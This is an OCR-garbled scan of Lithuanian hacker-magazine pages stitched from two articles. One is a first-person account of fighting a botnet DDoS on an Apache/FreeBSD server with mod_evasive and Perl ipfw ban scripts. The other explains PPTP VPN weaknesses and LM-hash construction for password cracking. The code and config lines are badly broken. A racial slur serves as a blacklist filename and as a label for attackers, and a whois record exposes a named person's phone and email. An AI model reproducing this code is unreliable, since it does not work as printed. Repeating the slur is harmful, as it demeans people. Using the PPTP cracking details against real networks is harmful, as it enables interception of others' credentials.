dė neišvengiama, tačiau reikėjo kažko imtis, nes likti be pinigų 
aš taip pat nenorėjau. 


[Modulinė apsauga] Visa galva pasinėręs į internetą, aš ban- 
džiau surasti apsisaugojimo nuo DDO0S priemones. Atrodė, kad 
po įvairiausių užklausų srautu buvo tik vienas servisas, o tai 
reiškia, kad problemos sprendimas turėjo būti kažkur paviršiu- 
je. Viename iš resursų aš aptikau nuoroda į Apache skirtą mMo- 
dulį, kuris vadinasi mod dosevasive. Kūrėjo žodžiais tariant, šis 
web serverio priedas leidžia apsisaugoti nuo stambaus masto 
atakos, jeigu pastaroji nukreipta prieš Apache. Man reikėjo tai 


patikrinti. Aš iš www.nuclearelephant.com/projects/dosevasive 
mod dosevasive 1.10.tar.gz parsisiunčiau patį modulį ir gana 
greitai išsaugojau jį serveryje. Teliko tik sukonfigūruoti httpd.conf 
Ir pamiršti rūpesčius. Bent jau taip buvo rašoma prie modulio 
pridėtame README :). 

Aš prie Apache konfigo pridėjau keletą papildomų eilučių: 


J0SPagelount 2 

OS Sita(: unt 50 

DOSPagelntervai 1 
Sitelntervai 1 

DOSSystemCommand “echo 


Modul 


[/100/ niūGeiZ 


Kad viskas būtų aiškiau, išsamiau aptarkime aukščiau pateik- 
tas eilutes. Pirmoje eilutėje inicializuojamas taip vadinamos hash 
entelės, kuri apdoroja WWW serveriui siunčiamas užklausas, 
dydis. Po to sukonfigūruojami užklausų į vieną puslapį ir į visą 
svetainę skaitikliai. Kreipimosi intervalas pagal nutylėjimą lygus 
vienai sekundei tai matosi iš toliau einančių direktyvų. Taigi 
jeigu Kas nors į vieną puslapį per vieną sekundę kreipsis tris 
kartus, tokio priešo IP adresas bus užblokuotas. Taip pat bus 
pasielgta ir daugkartinio kreipimosi į bet kurį svetainės puslapį 
atveju (50 bandymų per sekundę). Tačiau po blokavimo modu- 
lis tiesiog grąžina 403 klaidą. Net ir tokiu atveju stambaus masto 
itakos Metu serverio apkrovimas gali būti labai didelis. Norė- 
damas to išvengti aš sukonfigūravau modulį taip, kad jis adresą 
ąsčiausiai pridėtų į juodąjį sąrašą Avar/log/niggerz, kurį vė- 
iau apdoros specialus skriptas. Derėtų įvertinti faktą, kad rašy- 
mas atliekamas su nobody teisėmis, todėl šiai bylai reikia pri- 


pap 


skirti 666 teises. Taigi sistema 


š iooėė vo sukonfigūruota, teliko paleist 

net.inet.ip.fw.e httpd. Kaip ir reikėjo tikėtis, po web 

į a serverio paleidimo piktujų Nigeriu 

meikkja sąraše pradėjo atsirasti pirmieji IP 

adresai. Tačiau kažkodėl ju ten bu 

vo ne tiek daug, kaip aš tikėjausi 

Kiekvieną minutę per crontab buvo 

paleidžiamas specialus skriptas, 

kuris užbanindavo visus saraše su 

sikaupusius adresus, 0 po to išva- 

lydavo ši sąrašą. Viskas lyg ir veikė, tačiau ypatingo efekto nesi- 

jautė. Sistema taip pat stabdė, o httpd iš viso liovėsi iniciali- 
zuoti naujus susijungimus. 

[Nežinai pats — paklausk draugo] Kokių nors sprendimų pa- 

eškos internete buvo bevaisės. Forumuose DD0S problema 


praktiškai nebuvo svarstoma, o jeigu apie ją ir kalbėjo, tai gata- 


[Panašios ugniasienės] Jeigu tau nusišypsojo laimė ir da- 
bar dirbi su Linux sistema, perdaryti skriptus bus tikrai ne- 
sunku. Tereikia vietoje ipfw pasinaudoti iptables ugniasie- 
ne. Tačiau reikia atminti, kad ipfw komandoje žodis setup, 
kuris atsako už ESTABLISHED tipo susijungimus, turi būti 
pakeistas konstrukcija —m state —state ESTABLISHED. 
Derėtų taip pat įdarbinti taisyklių išsaugojimo po perkrovimo 
mechanizmą. Čia galimi du variantai — arba pasinaudoti 
servisinėmis komandomis (tokiomis, kaip /sbin/service ip- 
tables save), arba taisyklę į sąrašą įtraukti rankiniu būdu. 
Naudodamasis pastaruoju variantu nepamiršk, kad iptables 
taisyklių sąrašas paprastai saugomas čia: /etc/sysconfig/ip- 
tables. 
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vų sprendimų niekas nesiūlė. Nieko neliko, kaip per ICO apie 
tai paklausinėti pažįstamų adminų. Vienas iš jų su manimi pa- 
sidalino nuostabiu skriptu, kuris po to mane ir pastūmėjo su- 
kurti nuosavus apsisaugojimo nuo klastingųjų atakų metodus. 
Skriptas buvo parašytas su Perl ir nebuvo ypatingai sudėtingas. 
Jis kiekvieną minutę buvo iškviečiamas su cron, o po paleidimo 
peržiūrėdavo komandos netstat -ant|grep ESTABLISHED pa- 
teikiamą rezultatą. Po to būdavo nurodoma kažkokia susijungį- 
mų riba. Jeigu ši riba buvo peržengiama, IP adresas buvo įtrau- 
kiamas į juoduosius ugniasienės sąrašus. Mano bičiulis taip ne 
kartą apsisaugojo nuo stambaus masto atakos. 

Padėkojęs adminui, aš nusprendžiau šį skriptą įdiegti savo sis- 
temoje. Po nedidelio perdarymo skriptas buvo paruoštas nau- 
doti ir atrodė maždaug taip: 


Paprastas skriptas, skirtos apsisaugoti nuo DD0S 

+ Vust/bin/perl 

(odoutput = "netstat -ant | grep ESTABLISHED | awk '£print(NS4A55)Y"; 
Sarg = ŠARGV[O]; 

foreach Šline ((ODoutput) ( 

chomp(Šline); 

Slina= —/( NN (NN) 
Sdevs/'63.33.33.33') ="sis0"; 

Ssrcf$2) = Sdevs($1); 

Sips£$2) = Šips($2) +1; 


) 

foreach Šip (sort keys Yoips) ( 

if (Ssrc(Šip)) ( 

if (Sarg eą '0') ( print "(Šsrc4 ip?) Šip = > Šips(Šip) M"; |) 
if (Sips(Sip) > 7) ( 

chomp(Sdate = "date +"Yod.Yom.Yoy YoH-Y0M:0S“); 


vwvĘ sysctl -a|grep net.ru 

vwvvė sysctl -a|grep ip.fu 
net.inet.ip.fu.enable: 1 
net.inet.ip.fw.autoinc step: 100 
net.inet.ip.fw.one pass: 1 
net.inet.ip.fu.debug: 1 
net.inet.ip.fw.verbose: 1 
net.inet.ip.fw.verbose limit: 1000 
net.inet.ip.fw.dyn buckets: 256 
net.inet.ip.fw.curr dyn buckets: 
net.inet.ip.fw.dyn count: O 
net.inet.ip.fwv.dyn max: 4096 
net.inet.ip.fw.static count: 19 
net.inet.ip.fw.dyn ack lifetime: 
net.inet.ip.fu.dyn syn lifetime: 
net.inet.ip.fwv.dyn fin lifetime: 1 


256 


net.inet.ip.fw.dyn rst lifetime 
net.inet.ip.fw.dyn udp lifetime: 10 
net.inet.ip.fw.dyn short lifetime: 5 
net.inet.ip.fw.dyn keepalive: 1 

vvug | 


Branduoliniai ugniasienės nustatymai 


open(f, “> > /var/log/attack.log"); 

print f “Šdote -> attack/scan from Šip [Šips(Šip) Nr“; 
dose f; 

system(“/sbin/ipfw -ą add 13 deny ip from Šip to me“); 
))) 


Manau, šiame kode tu susigaudysi ir be papildomų komentarų, 
juolab kad skripto veikimą aš jau aprašiau. Mano atveju susi- 
jungimų limitas buvo lygus 7. Be pagrindinės savo funkcijos, 
skriptas išveda susijungimų statistiką, kad administratorius ži- 
notų, kas jį šiuo metu atakuoja :). 

Tačiau ir šis metodas nesuteikė šimtaprocentinės apsaugos nuo 
atakos. Po poros valandų apkrovimo indikatorius realiai suma- 
žėjo iki 4096, tačiau vis tiek jautėsi, kad ataka tęsiasi. Beje, 
reikia pastebėti, kad standartinė ugniasienė sėkmingai susido- 
rojo su priešo spaudimu, tiesiog egzistavo kažkokie specialūs 
botai, kuriems pavykdavo apeiti mano gudrųjį skriptą. 

Šiuos botus aš aptikau vos po keleto minučių :). Tam man ma- 
no ipfw ugniasienėje reikėjo įjungti opciją verbose. Tai daroma 
su paprasta komanda sysct! -w net.inet.ip.fw.verbose=1. Po 
to aš sukūriau paprastą taisyklę, kuri apdoroja visus paketus. 
Pastaroji taisyklė turi savo numeriu aplenkti taisyklę, kuri už- 
draudžia visą į mašiną atkeliaujantį tinklo srautą. Vietoje taisyk- 
lės numerio aš pasirinkau skaičių 50000. Pati pridėjimo ko- 
manda atrodo štai taip: 


ipfw add 50000 count log logamount O ip from any to me 80 


Dabar buvo galima pradėti bylos Aar/log/security analizę. Ten 
pagal nutylėjimą buvo pradėti rašyti visi kreipiniai į serverio 80 
jungtį. Šiek tiek perdaręs aukščiau aprašytą skriptą, aš pradė- 
jau nuskaitinėti fiksuotą logo fragmentą (su komanda tail -1000 
Įvar/log/security) ir iš ten imti kreipimusi kiekį. Rezultato ilgai 
laukti nereikėjo — vos po 2-3 paleidimų serverio apkrovimas 
vėl nukrito. 

Tačiau panašiu metodu nebuvo galima apsisaugoti visu 10096, 
kadangi per savo veikimo laiką skriptas jau spėjo užbaninti 20- 
30 Iegalių svetainės lankytojų :). Tai paaiškinama tuo, kad pa- 
prastas vartotojas esant tam tikroms sąlygoms kuo puikiausiai 
gali viršyti mano nurodytas kreipimųsi skaičiaus ribas (atnauji- 
nant puslapį arba turint siauresnio pralaidumo kanalą). 
Aukščiau aprašyta apsauga aš naudojausi tris dienas. Kaip jau 
minėjau, per tą laiką ugniasienės užbanintųjų sąraše susikau- 
pė apie šimtą padorių vartotojų. Skriptą tekdavo praleisti tris- 
keturis kartus per dieną. Be jokios abejonės, tokia apsauga 
veikė, tačiau pasitikėti ja visu šimtu procentų nebuvo galima. 
Būtent todėl aš nusprendžiau sukurti naują projekto, skirto ko- 
voti prieš DDOS atakas, variantą. Čia man labai padėjo Apache 
žurnalizavimo (logging) sistema. 

Man norėjosi pažiūrėti į užklausas, kurias botai siunčia WWW 
serveriui. Kaip paaiškėjo, praktiškai visos užklausos buvo vieno- 
dos ir nesiskyrė nuo vartotojiškų. Iš pirmo žvilgsnio užklausoje 
buvo Referrer, teisingai suformuotas kreipinys į atsitiktinį, tačiau 
egzistuojantį puslapį, bei realus UserAgent. Tačiau pastarasis lau- 
kas privertė mane suabejoti užklausos teisingumu. Daugelyje |0- 
ge užregistruotų eilučių UserĄgent prasidėdavo fraze „Win 98.x“. 
Greičiausiai tai ir buvo vienintelis išskirtinis priešiškų užklausų bruo- 
žas, dėl ko jos, savaime suprantama, skirdavosi nuo paprastų 
užklausų. Mano galvoje jau gimė naujas serverio apsaugojimo 


nuo botų planas. Ir vos po 15 minučių aš jį įgyvendinau kompak- 
tiško Per! skripto pavidalu. Būtų nuodėmė nepateikti jo kodo, ka- 
dangi jis gali praversti daugeliui administratorių. 


Perl skriptas, išgelbėjantis nuo DD0S 

+ Uusi/bin/perl 

Snum = "cot /var/log/rule“; 4 Šioje byloje saugomas taisyklės numeris 

chomp Šnum; 

+ Išgriebiam paskutinius 1000 įrašų su šablonu, iš jo iškerpam 

+£ IP adresa ir pašalinam dublikatus 

Semd = "tail -1000 /ust/local/apache/logs/access.log | grep Win 9x 4. | cut -F -d | sort -u“; 
(Dcmd = Semd'; 

chomp (Dcmd; 

foreach Seach ((Dcmd) į 

chomp Šeach; 

Srule=0); 

chomp Šrule; 

open(DB,"/var/log/niggerz"); 

while(<D8>) ( 

it (/Seach/) ( Siule = 1; break | > Jeigu adresas jau yra bazėje, užbaigiam darbą 


Į 

tlose(DB); 

unless (Šrule) ( 

system(“/sbin/ipfw add Šnum deny ip from Šeach to me 80“); 46 Priešingu atveju įtraukia- 
me IP adresą į juodąjį sąrašą 

open(L06," > > /var/log/dos.log"); 

print LOG “banned ip Šeach as rules ŠnunNn“, 

dose(L06); 

open(DB," > > /var/log/niggerz"); 

print DB “Seachkn"; ž£ Įrašą toip pat pridedame į logą ir į įvodašiknių bazę :). 

dose(DB); 

Snum+ +; 

)) 

"echo Snum > /var/log/tule“; 3 Atnaujiname taisyklės numerį 


Šis skriptas apdoroja logą ir ieško išsiskiriančių užklausų, iš ku- 
rių po to išgauna IP adresą, 0 po to ieško analogiškų IP adresų 
specialioje bazėje. Jeigu adreso ten nėra, tai reiškia, kad jo 
nėra ir ipfw taisyklių sąraše, iš ko išplaukia, kad jis ten labai 
greitai atsidurs :). Priešingu atveju boto IP jau buvo užregistruo- 


person: Marthias Blum 

address: Infonet SA/NV 

address: Av. Louise 350-358 Box 3 
address: 1050 Brussels 

address: Belgium 

phone: +32 2 627 3969 

fax-no: +32 2 627 3934 

e-mail: Matthias Blumūinfonet.com 
mnt-by: MAINT-A52007 

nic-hdl: HB16085-RIPE 


source: RIPE £ Filtered 


+ Informarion related to 'MB18085-RIPE' 


route: 213.31.0.0/16 
descr: INFONET-EUROPE 
origin: A53300 

mnt-by: MAINT-AS2007 
mnt-by: EOIP-MNT 
mnt-routes: MAINT-A52007 
mnt-routes: EOCIP-MNT 


source: RIPE $ Filtered 


Studijuojame logus 


tas, todėl skriptas neteršia ugniasienės pakartotine taisykle. 
Skriptas antiddos.pl paleidžiamas per crontab kiekvieną minu- 
tę. To visiškai pakanka, kad atremtum 2-3 tūkstančių botų ata- 
ką, kaip ir buvo mano atveju. Vienintelis skripto darbo trūkumas 
tas, kad jis negali greitai atstatyti serverio darbingumo. Kitaip 
tariant, ypatingai aktyvios atakos metu (20-30 užklausų vienu 
laiko tarpu) serveris vis tiek iškeliauja į komos būseną, tačiau iš 
jos sugrįžta po 3-4 minučių :). 


[Adminas miega, ataka vyksta] Jeigu tu manai, kad aš palei- 
dau skriptą ir pamiršau apie botus, tai labai smarkiai klysti :). 
Nepaisant to, kad už tinklo srautą aš nemokėjau (o botai per 
dieną prisukdavo apie 500 megabaitų šlamšto), aš užsimaniau 
teisybės. Taigi mano užduotis buvo parašyti abuse adresais vi- 
siems tinklo administratoriams, kurių tinkluose veikė botai. Tuo 
pačiu aš sunaikinčiau botnetą. Per valandą pasinaudodamas 
whois, bash'inėmis ir dar visokiomis automatizavimo priemonė- 
mis :), aš surinkau 9096 botų tinklų administratorių pašto adre- 
sus. Mano užduotis supaprastėjo dėl to, kad daugeliu atvejų ata- 
kuojama buvo iš vieno potinklio. Taigi man reikėjo parašyti viso 
labo 400 skundų, taip pranešant apie visas pažeidžiamas maši- 
nas. Užduotį aš įvykdžiau per tris valandas, o vos po dienos gavau 
atsakymus bent iš pusės adminų, kurie pažadėjo nukenksminti 
užkratą pasigavusią mašiną. Vos po savaitės floodo srautas į mano 
serverį buvo visiškai nutrauktas. Greičiausiai botmasteris supra- 
to, kad su manimi susidėti pavojinga, arba floodo užsakovas nu- 
stojo už ataką mokėti pinigus. Šiaip ar taip, aš nugalėjau blogie- 
čius, kuo iki šiol labai džiaugiuosi. 

Šios pasakaitės moralė tokia: net jeigu tave atakuoja tūkstan- 
čiai botų, 0 tavo paslaugos tiekėjas atsisako padėti, veik sava- 
rankiškai. Straipsnyje aš pateikiau keletą paruoštų apsisaugoji- 
mo nuo pačių pavojingiausių atakų sprendimų, tavo užduotis — 
išsirinkti optimalų variantą. Jeigu tu moki už tinklo srautą ir ta- 
vęs netenkina nė vienas variantas, pabandyk pakeisti duomenų 
centrą į draugiškesnį, kur rūpinamasi kiekvienu klientu arba bent 
jau neimami pinigai už tinklo srautą :) 
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Purvinieji VPN digeriai 

VPN — VIRTUALŪS PRIVATIEJI TINKLAI — 
PLĖTOJASI KAIP IDEALI KONFIDENCIALIŲ 
DUOMENŲ PERDAVIMO PER INTERNETĄ 
ARBA BELAIDŽIUS TINKLUS PRIEMONĖ, NE- 
PAVALDI HAKERIŲ ATAKOMS. SKAITYDAMAS 
GAUSYBĘ STRAIPSNIŲ APIE VPN, GALĖJAI 
SUSIDARYTI NUOMONĘ, JOG SI TECHNO- 
LOGIJA — TIKRA PANACEJA NUO VISŲ PRO- 
BLEMŲ, SUSIJUSIŲ SU SLAPTŲ DUOME- 
NŲ PERDAVIMU PER NEAPSAUGOTUS TIN- 
KLUS. TAČIAU PRAKTIKOJE PASIRODO, JOG 
VPN NAUDOJIMAS IR GARANTUOTAS TIK- 
RUMAS DĖL DUOMENŲ SAUGUMO GALI 
IŠKRĖSTI PIKT, a POKŠTĄ. 


SCENA 


UNIXOID 


CODING 


VPN realizacijų 


veikimas, trūkumai ir klaidos 

[Kaip viskas buvo] Prieš trisdešimt metu, kai inter- 
netas dar tik gimė, konfidencialiais duomenimis buvo 
keičiamasi per skirtinius kanalus ir X.25 tinklus, ku- 
rie sukurti įprastinių telefoninių tinklų pagrindu. Taip 
pat buvo naudojamas tiesioginis modeminis susi- 
jungimas, radiorelinis ryšys ir kitos telekomunikaci- 


UNITS 


nės priemonės. Aukštas saugumo laipsnis buvo „kompen- 
suojamas“ tokia pat aukšta duomenų perdavimo kaina ir 
juokingu greičiu. 


[Kriptografijos progresas] Besiplėtojant kriptografijai viskas 
pasikeitė. Atsirado galimybė šifruotus duomenis perduoti per 
atvirus tinklus, kuriuose duomenys gali būti perimti. Tam juose 
padaromi taip vadinami virtualūs tuneliai (virtual tunnel arba 
piggy-back). Pats perdavimo mechanizmas nepasikeitė. Prie jo 
viso labo prisidėjo šifravimas. Bet ar šifravimas nebuvo naudo- 
jamas anksčiau? Kame gi pasiūlytos technologijos revoliucin- 
gumas? Ogi tame, kad tradicinė simetrinė kriptografija reika- 
lauja iš anksto perduoti slaptą raktą, kuriuo gavėjas dešifruos 
tekstą. Iš to išplaukia, jog reikia apsaugoto perdavimo kanalo. 
O tokio kanalo dažniausiai iš viso nėra. Jeigu jis yra, tai galima 
nekvaršinti galvos šifravimu ir tekstą perduoti tiesiogiai. Yra ir 
kitų problemų. Raktus reikia kuo dažniau keisti, beje, reikia sau- 
gotis ne tik nuo šifro atskleidimo, bet ir nuo suklastotų slapta- 
žodžių primetimo. Kitaip tariant, totalus vargas. 


Įdomus faktas: ĮKE-s 
can'e neseniai buvo Su 


Virtualiuose tinkluose šios 
problemos išspręstos. Jie iš 
tiesų pakeitė pasaulį, išlais- 
vinę tarptautines Kkorporacijas 
nuo būtinybės plėtoti nuosa- 


[ Dė 
įrankis pats pasirodė be- 
sąs smarkiai pažeidžia 


maš. vą visur išsiraizgiusių kabelių 


struktūrą. Ir nors „Microsoft“ 
juos įnirtingai prastūminėjo į 
smulkųjį verslą, krumpliaračiai 
sukosi žiauriai girgždėdami, vi- 
sas reikalas toliau reklamos 
sukelto triukšmo nenuėjo. 
Nuotoliniam darbui su biuru 


Derėtų suprasti, log sve- 
timų apsaugotų kanalų 
pasiklausymas — tai nu 
sikalstama veikia, Ir nors 
Iu pakankama, letz 

kač realiai nulaužtumn 
svetimą VPN kanalą, 
mes tave persoėlome 


APM 
VPN valdymas 
VPN 
Maršrutizatorius Apsaugotas 
Apsaugotas 4 Ven LAN segmentas 
LAN segmentas - 4 as šiiuzas 
Maršrutizatorius" 


Tipiško VPN tinklo architektūra 


Protokolo numerio laukas IP paketo antraštėje 


kuo puikiausiai pakanka paprastų interneto kanalų saugu- 
mo, o apie „naminius“ lokalius tinklus aš iš viso nekalbu. 
Belaidžiuose tinkluose VPN technologija labai tiko. Radijo ban- 
gos nežino ribų ir yra perimamos santykinai dideliais atstumais. 
Isilaužimo paprastumą smarkiai sustiprina saugumo reikalavi- 
mai. Bet kuris sniferiu apsiginklavęs jaunuolis gali peržiūrėti pa- 
što dėžutės slaptažodį ir jį pakeisti, jau nė nekalbant apie as- 
meninio susirašinėjimo skaitymą. Purvinomis rankomis į sveti- 
mą širdį! O kam tada tas VPN? Įdiegsime jį ir jausimės kaip už 
akmens sienos! Ar ta siena tik iš išorės akmeninė, o iš tiesų tai 
paprasčiausias kartonas? Pamėginkime išsiaiškinti. 


[VPN architektūra] VPN yra įspūdingas statinys, panaudojan- 
tis dešimtis skirtingų protokolų, varinėjančių duomenų paketus 
lyg kraują po arterijas. Pilna VPN architektūros analizė į mūsų 
užduotis neįeina (juolab kad ji nuolat plėtojasi ir tobulėja). Ban- 
ką plėšiančiam įsilaužėliui visiškai nebūtina žinoti unitazų išpla- 
navimo ir apkrauti smegeninę visų kanalizacijos vamzdžių išsi- 
raizgymo planu. Nors ši informacija gali būti labai naudinga pla- 
nuojant atsitraukimo kelius, daugelis apsiriboja pagrindinių marš- 
rutų išstudijavimu: durys — kasa — seifas. Taip pat pasielgsi- 
me ir mes. 


[PPTP viduje] PPTP (Point to Point Tunneling Protocol) protoko- 
las — tai pagrindinis Windows sistemoms skirtų VPN tinklų kū- 
rimo protokolas. Jis dvi sistemas susieja virtualiu ryšio kanalu. 
Vienoje pusėje yra klientas (client), o kitoje — serveris (server). 
Kas yra tunelio viduje? Norėdamas palaikyti savo darbingumą, 


serveris atidaro 1723 TCP jungtį, per kurią veikia veikimo užtik- 
rinimo sistema, kitaip dar vadinama Control Connection — tar- 
nybinis ryšio kanalas, susiejantis serverį su klientu (iš pradžių 
buvo naudojama 5678 jungtis, bet IANA — Internet Assigned 
Numbers Authority — domenus ir jungtis registruojanti organi- 
zacija nusprendė kitaip ir patvirtino PPTP serverio jungtį 1723, 
likusių užregistruotų jungčių sąrašą galima rasti adresu www.ia- 
na.org/assignments/port-numbers). Pas klientą jungtis gali būti 
bet kokia ir ji pasirenkama (tai daro operacinė sistema) sava- 
rankiškai. Čia nereikia jokios autentifikacijos, kas atveria erd- 
ves įvairiausioms machinacijoms, pavyzdžiui, hakeris gali pri- 
verstinai uždaryti svetimą sesiją. 

Tarnybinis kanalas pagrinde naudojamas srauto gavimo greičiui 
valdyti, siekiant išvengti prastovų ir užkirsti kelią „užsikimšimams“. 
Tai įgyvendinama siunčiant specialius PPTP (PPTP Control Con- 
nection message) pranešimus. Kiekvienas toks pranešimas pra- 
sideda antrašte, o baigiasi „gamykline“ informacija. Antraštės 
ilgis fiksuotas — 8 oktetai. Pranešimo kūnas sudarytas iš: ilgio 
lauko (Total message length), pranešimo tipo: tarnybinis arba 
valdantis (Control Message/Management Message) ir magiš- 
kosios sekos 4Dh 3C 2C 1Ah, pagal kurią jį galima lengvai iden- 
tifikuoti bendrame tinklo sraute ir kurią naudoja programa de- 
ceit.c (http://packetstormsecurity.nI/new-exploits/deceit.c), pe- 
rimanti hešuotus slaptažodžius. Bet neužbėkime į priekį, todėl 
kol kas grįžkime prie „Microsoft“ ir jos avinų. 

Pats tunelis nenaudoja TCP ir veikia išskirtinai IP lygyje, panau- 
dodamas enkapsuliacijos protokolą GRE (Generic Encapsula- 
tion Protocol). Tai ganėtinai savarankiškas protokolas, niekaip 
nepriklausantis nuo PPTP ir aprašytas dviejuose RFC dokumen- 
tuose: RFC 1701 RFC 1702 (tačiau „Microsoft“ naudoja nuo- 
savus praplėtimus, kurie žinomi GRE v2 pavadinimu). Perduo- 
dami duomenys suskaidomi į paketus ir perduodami per IP 47 


Data on the who 


Scheminė VPN per Ethernet realizacija 
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protokolą, kuris susietas su GRE. Šiuo atveju „protokolas“ — 
tai IP paketo laukas protocol. Nepainiok jo su jungtimi! IP neturi 
jokių jungčių. Jos yra aukštesnio lygio protokoluose — TCP ir 
UDP o GRE — tiesiog dar vienas protokolas. 

Išoriškai GRE labai panašus į TCP jame yra slystančio lango 
(sliding window), segmentų (segments), sekų numerių (segu- 
ence number) ir patvirtinimo numerių (acknowledgement num- 
ber) sąvokos. Praktiniu požiūriu tai reiškia, jog tiesioginis PPP 
paketų spoofinimas neįmanomas. Jeigu mes bandome serve- 
riui (arba klientui) pakišti suklastotą paketą, tai įvyks sesijos 
desinchronizacija ir susijungimas bus pažeistas. Lokaliuose tin- 
kluose ši problema išsprendžiama pasiunčiant 2 “ 32 paketų. 
Kadangi seguence number laukas užima 32 bitus, tai įvyksta jo 
perpildymas ir skaitliuko reikšmė vėl atstatoma. Vis dėlto ata- 
kai internetu tai pareikalaus neįsivaizduojamo laiko kiekio. Si- 
tuacija atrodo beviltiška, tačiau tam tikra spraga vis dėlto yra. 

GRE paketo antraštėje yra speciali vėliavėlė Seguence Number 
Present (3 bitas), kuri sąlyginai žymima raide S. Jeigu ji lygi 
nuliui, tai sekos numeris pripažįstamas negaliojančiu ir priiman- 
čioji pusė turėtų jį ignoruoti. Bent jau taip byloja Standartas. 
Savaime suprantama, konkrečios realizacijos gali iš esmės skir- 
tis. Nepaisant to, potenciali landa vis dėlto yra. Beje, Standar- 
tas nepateikia jokių nurodymų, kaip apdoroti dublikatus (pake- 
tus su vienodu sekos numeriu), palikdamas tai konkrečių reali- 
zacijų sąžinei. Priimančioji pusė gali arba atmesti vieną iš pake- 
tų, arba pareikalauti pakartotino jo perdavimo. Abiem atvejais 
desinchronizacija neįvyksta, t.y. gauname lyg ir save sinchroni- 
zuojantį protokolą. 

Virš GRE realizuoti autentifikacijos ir šifravimo protokolai (jei 
būtina, dar ir suspaudimo, už ką dažniausiai atsako MPPE). 
„Microsoft“ pateikia pakankamai didelį skirtingų protokolų asor- 
timentą (žr. atitinkamą iškarpą), todėl klientui su serveriu yra ką 
pasirinkti! Jei nori, šifravimą iš viso galima atjungti, o autentifi- 
kaciją realizuoti „atviru“ tekstu, tačiau tai bus labai jau netolia- 
regiškas sprendimas, visiškai nuvertinantis VPN ideologiją ir at- 
veriantis duris visiems norintiesiems. Normalūs adminai taip 
nesielgia, teikdami pirmenybę labiau apsaugotiems MS-CHAP 
ir LANMAN Hash. 

Iš tiesų jų saugumas smarkiai perdėtas, ir jie jau seniai nulauž- 
ti. Išsamiau apie tai galima perskaityti mano straipsnyje „Tinklo 
atakų technika“, kurio elektroninę kopiją nemokamai gali parsi- 


[Ką perskaityti?] 

— Malware FAO Microsoft PPTP VPN — išsamus ir nuovokus 
FAO apie VPN laužimą (anglų kalba): www.sans.org/resour- 
ces/malwarefag/pptp-vpn.php 

- Breaking the Secure Safe — fragmentas iš knygos Wire- 
less Hacking: Breaking Through, skirtos belaidžių tinklų lau- 
žimui su daugybe praktinių pavyzdžių (anglų kalba): www.in- 
formit.com/articles/article.asp?p=3537354seą- 
Num=86r!=1 

- [The Crumbling Tunnel/-<A Menagerie of PPTP Vulnerabili- 
ties> — straipsnis iš phrack'o su detalia PPTP protokolo pa- 
žeidžiamumų analize (anglų kalba): www.phrack.org/phrack/ 
53/P53-12 

— „Microsoft“ PPTP protokolo kriptoanalizė — žymaus kripto- 
analitiko Briuso Šnaierio straipsnio vertimas (rusų kalba): 
www.ssl.stu.neva.ru/psW/crypto/pptp.html 


siųsti iš ftp serverio nezumi.org.ru. Be to, šifruojami tik paketai 
su duomenimis (DATA packets). Tarnybiniai protokolai, kurie su- 
daro ganėtinai žymią PPP srauto dalį, tokie, kaip, pavyzdžiui, 
LCP — Link Control Protocol — lieka nešifruoti su visomis iš to 
išplaukiančiomis pasekmėmis. 


[Autentifikacija iš išorės ir iš vidaus] Autentifikacija atlieka- 
ma arba atviru tekstu (clear text password), arba pagal užklau- 
sos/atsakymo (Challenge/Response) schemą. Su atviru tekstu 
viskas aišku. Klientas pasiunčia serveriui slaptažodį. Serveris jį 
sulygina su etalonu ir sako „eik tu n4x...“ arba „sveikas atwy- 
kęs“. Sniferiu apsiginklavęs hakeris gali lengvai perimti atviru 
tekstu siunčiamą slaptažodį, po ko visa apsauga iškeliauja į 
dausas. Mums šis atvejis neidomus, todėl ties juo neapsistosi- 
me. Be to, atvira autentifikacija realiame pasaulyje praktiškai 
nesutinkama. Užklausos/atsakymo schema kur kas pažanges- 
nė. Bendrai ji atrodo štai taip: 

1. Klientas pasiunčia serveriui autentifikacijos užklausą (reguest). 
2. Serveris grąžina atsitiktinį atsakymą (challenge). 

3. Klientas sugeneruoja savo slaptažodžio hešą, su juo užšif- 
ruoja atsakymą ir perduoda jį serveriui. 

4. Tą patį padaro ir serveris, kuris gautą rezultatą sulygina su 
kliento atsakymu. 

5. Jeigu užšifruotas atsakymas sutampa, autentifikacija laiko- 
ma sėkminga. 


Taigi norint autentifikuotis visiškai nebūtina žinoti originalaus 
slaptažodžio, pakanka atspėti/perrinkti/perimti jo hešą, tačiau 
hešas per tinklą nėra perduodamas atviru pavidalu, todėl ši 
schema laikoma atsparia perėmimui, kas yra labai gerai. O štai 
jos trūkumai: hešas kažkaip turi patekti į serverį, todėl slapta- 
žodžio perdavimui reikalingas apsaugotas kanalas. Tai pirma. 
Autentifikacijos procedūra pažeidžiama brute-force atakai. Pe- 
rėmę pradinį ir užšifruotą challenge, mes galime pabandyti pa- 
rinkti šifravimo raktą, perrinkdami tiek variantų, kiek tik norim. 
Nei serveris, nei klientas šiame sumanyme nedalyvauja ir ne- 
gali mums sutrukdyti. Tai antra. Sistemos atsparumas nustato- 
mas pagal formulę min(strien(passwd),sizeof(hash)). Jeigu he- 
šas trumpas, tai slaptažodžio ilgis neturi jokios įtakos, todėl 
laužimas gali baigtis per labai trumpą laiką. Tai trečia. Tačiau 
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VPN stekas 


visa tai tik sausa teorija. Pažiūrėkime, kaip reikalai su praktika. 
Microsoft Windows tinka du hešų tipai: „gimtąsis“ NT hešas ir 
LAN Manager hešas, kurį langinės paveldėjo iš OS/2 (kažkada 
labai senai šios sistemos buvo kuriamos kartu) ir kuris sėkmin- 
gai išgyveno iki mūsų dienų, nepaisant net jo katastrofiško ne- 
saugumo. Kaip jis apskaičiuojamas? Ogi štai taip! 

1. Kliento slaptažodis transformuojamas į 14 baitų ASCI! eilutę 
(ilgesni slaptažodžiai nukertami, o trumpesni papildomi nuliais). 
2. Visi simboliai pervedami į viršutinį registrą. 

3. 14 simbolių slaptažodis suskaidomas į dvi 7 simbolių „pu- 
seles“. 

4. Su kiekviena 7 simbolių „pusele“ pagal DES algoritmą užšif- 
ruojama pastovi konstanta AAD3B435B5140EEh 

5. Sudaromos dvi 8 baitų eilutės. 

6. Šios eilutės viena su kita „suklijuojamos“, taip suformuoda- 
mos 16 baitų heša 


Nepriklausomas slaptažodžio puselių hešavimas 1 000 000 
000 000 000 kartų sumažina jo perrinkimui reikalingų bandy- 
mų skaičių (ir visai ne du kartus, kaip tai gali pasirodyti iš pirmo 
karto). Kokio reikia talento, kad padarytum tokią kvailystę! Kiek 
jau kartų visam pasauliui (tai yra gamintojams) buvo sakyta 
neužsiiminėkite saviveikla, naudokite laiko patikrintus algorit- 
mus, tik viskas perniek. Situaciją paaštrina tai, kad DES algorit- 
